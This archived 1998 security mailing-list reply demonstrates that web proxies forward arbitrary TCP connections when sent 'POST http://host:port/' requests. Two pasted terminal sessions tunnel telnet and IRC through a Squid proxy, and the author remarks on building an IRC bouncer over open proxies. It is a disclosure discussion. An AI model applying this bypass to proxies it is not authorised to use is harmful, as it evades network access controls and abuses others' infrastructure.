Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering

From: Peter van Dijk (peterat_private)
Date: Tue Oct 13 1998 - 14:08:44 PDT

Next message: Peter Jeremy: "Re: False security in switches and a little more Rconsole."

Previous message: ga: "pcnfsd ..."
Next in thread: Kevin Way: "Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> > Date: Thu, 08 Oct 1998 08:27:36 +0100
> > From:  "Mnemonix" <mnemonixat_private>
> >
> > Firstly it seems that most web-based proxies, not just MS Proxy, are
> > susceptible to this kind of attack. Thanks to Greg Jones and others for
> > doing some testing on this.
>
>  HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
> pass them straightforward.

Very untrue. Look at this:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0

VuurWerk Internet Telnet Server
(telnet.vuurwerk.nl)

Alle transacties worden gelogged, het gebruik
van deze server is alleen voor klanten van
VuurWerk tbv. het onderhoud van hun eigen site.

POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200

login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
  PID TTY STAT TIME COMMAND
 5896  p6 S    0:00 /bin/login -h p8ur.cistron.nl -p
 5901  p6 S    0:00  \_ -bash
 6175  p6 S    0:00      \_ telnet proxy 8080
 6186  p8 S    0:00 /bin/login -h rotterdam vuurwerk.nl -p
 6190  p8 S    0:00  \_ -bash
 6205  p8 R    0:00      \_ ps xfww
[hardbeat@haarlem hardbeat]$

Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
will happily forward me, and telnet works as if there's no proxy inbetween.

Another great example:

[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0

nick Hardbeat2
PING :1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST

I can happily IRC now... imagine how easy it would be to write an IRC bouncer
that uses a proxy. Lots of proxies have NO acl or firewall around them.

The only thing I have _not_ succeeded in until now is chaining proxies with
GET or POST requests.

Greetz, Peter.
--
'I guess anybody who walks away from a root shell at :         Peter van Dijk
 a nerd party gets what they deserve!' -- BillSF     :peterat_private
-- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --   -- --
finger peterat_private for my public PGP-key
  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -  ---  -

Next message: Peter Jeremy: "Re: False security in switches and a little more Rconsole."
Previous message: ga: "pcnfsd ..."
Next in thread: Kevin Way: "Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:19:40 PDT